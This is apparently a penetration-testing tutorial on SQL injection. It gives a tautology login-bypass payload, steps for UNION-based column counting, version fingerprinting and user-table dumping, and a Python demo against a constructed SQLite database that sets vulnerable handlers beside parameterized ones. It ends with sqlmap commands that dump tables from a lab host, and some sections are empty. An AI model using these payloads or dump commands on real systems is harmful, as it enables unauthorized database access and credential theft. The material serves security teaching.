Hacking SQL

Things to look for:

  • URL parameters that look like they feed a database query

  • Any form that touches a database

  • Settings and profile fields the user can edit (these are often written to the database and read back later, so a payload can fire on a different page than the one it was entered on)

  • Header values like the User-Agent that might get stored in the DB

  • Fuzz characters: ' " # -- , and keywords such as SELECT and UNION; an error, a blank page or a different number of rows in the response means the input is reaching the query

Tools to help:

  • Metasploit (MSF) auxiliary modules for SQL enumeration

  • sqlmap, a fully featured SQL injection detection and enumeration tool

Impact:

  • Dump the database

  • Read the file system

  • Run OS commands

  • Create an admin login

  • Install shells on the host

Basic Commands:

The login bypass / table dump: ' OR 'a'='a (a tautology: once the quote closes the string, OR 'a'='a' makes the WHERE clause true for every row)

Url injection:

First test that we control the query and can see its output. Requesting a non-existent id such as 9999 returns only the page frame with no record, which gives a clean baseline to compare against.

Now we use an existing id and append both a true condition and a false condition. The true one should still return the record and the false one should return the empty frame; if both behave the same, the input is not reaching the query.

True:

False:

Now we append a UNION SELECT and keep incrementing the number of NULLs until the query stops erroring. The first count that works is the number of columns in the original SELECT.

Now we find the type of each column by replacing one NULL at a time with a number or a 'string' and seeing which the database accepts, if it enforces types. Once we know the types we switch back to id 9999 so that only our injected row is shown in the populated fields.

Now we put @@version in a column that accepts a string, and then look up the Pentest Monkey SQL injection cheat sheet for that database and version to get the right syntax for the queries that follow.

Here we test the current-user query to get the DB user:

Next we try the list-users query, which takes some slight edits. (The table name could have been found with a query, but it was already known here.)

This gives the first user in the table. We could add a WHERE clause (or LIMIT/OFFSET) and enumerate users one at a time, but at this point we are better off letting sqlmap do it.
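The login bypass above and the id-parameter procedure (baseline, true/false test, UNION column count, version, user dump) carried through end to end, as an added example that is not from the original page. It runs against a constructed in-memory SQLite database with made-up items and users tables; sqlite_version() stands in for @@version, and the column-type probing step is left out because SQLite does not enforce column types across a UNION. Each vulnerable handler is shown beside a parameterized version that the same payloads no longer affect.

```python
import sqlite3


# Constructed sample database standing in for the target's backend
# (demo data, not from any real site). Passwords are stored in
# plaintext purely to keep the example short.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)",
                     [(1, "widget", 9.5), (2, "gadget", 12.0)])
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "david", "test")])
    return conn


# --- vulnerable handlers: user input is concatenated into the SQL ---

def login_vulnerable(conn, username: str, password: str) -> bool:
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def item_lookup_vulnerable(conn, item_id: str) -> list:
    # Mirrors a page that reads ?id=... straight into the query.
    sql = f"SELECT name, price FROM items WHERE id = {item_id}"
    return conn.execute(sql).fetchall()


# --- hardened handlers: bound parameters, so input is only ever data ---

def login_safe(conn, username: str, password: str) -> bool:
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row is not None


def item_lookup_safe(conn, item_id: str) -> list:
    try:
        id_num = int(item_id)  # reject anything that is not a bare integer
    except ValueError:
        return []
    return conn.execute("SELECT name, price FROM items WHERE id = ?",
                        (id_num,)).fetchall()


# --- the attacker's side, following the steps in the notes ---

def boolean_probe(conn, real_id: str):
    """True/false test on a real id: the true condition should keep the
    record and the false one should give the empty frame."""
    return (item_lookup_vulnerable(conn, f"{real_id} AND 1=1"),
            item_lookup_vulnerable(conn, f"{real_id} AND 1=2"))


def find_column_count(conn, max_cols: int = 10):
    """Append UNION SELECT NULL,NULL,... until the column counts match.
    A mismatch raises a database error; the first count that works wins."""
    for n in range(1, max_cols + 1):
        payload = "9999 UNION SELECT " + ",".join(["NULL"] * n)
        try:
            item_lookup_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def fingerprint(conn) -> str:
    # SQLite has no @@version; sqlite_version() is its equivalent.
    rows = item_lookup_vulnerable(conn, "9999 UNION SELECT sqlite_version(), NULL")
    return rows[0][0]


def dump_users(conn) -> list:
    # id 9999 matches nothing, so only the injected rows come back.
    return item_lookup_vulnerable(conn, "9999 UNION SELECT username, password FROM users")


if __name__ == "__main__":
    db = build_db()
    print("bypass on vulnerable login:", login_vulnerable(db, "admin", "' OR 'a'='a"))
    print("same payload on safe login: ", login_safe(db, "admin", "' OR 'a'='a"))
    print("true/false probe:", boolean_probe(db, "1"))
    print("columns in original SELECT:", find_column_count(db))
    print("db version:", fingerprint(db))
    print("users table:", dump_users(db))
    print("union payload on safe lookup:",
          item_lookup_safe(db, "9999 UNION SELECT username, password FROM users"))
```

The column-count loop is the same mechanical step as incrementing NULLs by hand in the browser; the only difference is that here the error is caught instead of read off the page. On a real target you see the same signal as a SQL error or a blank frame rather than an exception.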

Authentication bypass:

If there is a login portal, sign in (or attempt to) and send the traffic through Burp. Then map the login request and hand it to sqlmap to fuzz its parameters for injection.

sqlmap -u "http://3.lab.auth.site/ajax.php?fun=login&username=david&password=test" --keep-alive

In method one we use the GET request just as ajax.php generates it. This may not always work, so we also try POSTing the same parameter data, and try injecting at other data points such as the User-Agent, Referer, and so on. In this example, method 2 (POST) finds SQLi on username, likely bypassing a security mechanism that only inspects GET parameters.

We can now specify the vulnerable parameter with -p and what we want to dump from it (--dbs/--tables/--columns to enumerate, then -D/-T/--dump to pull the rows):

sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -p username --dbs --tables --columns --keep-alive
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -D ratingAgency3 -T analyst --dump --keep-alive

Loot:
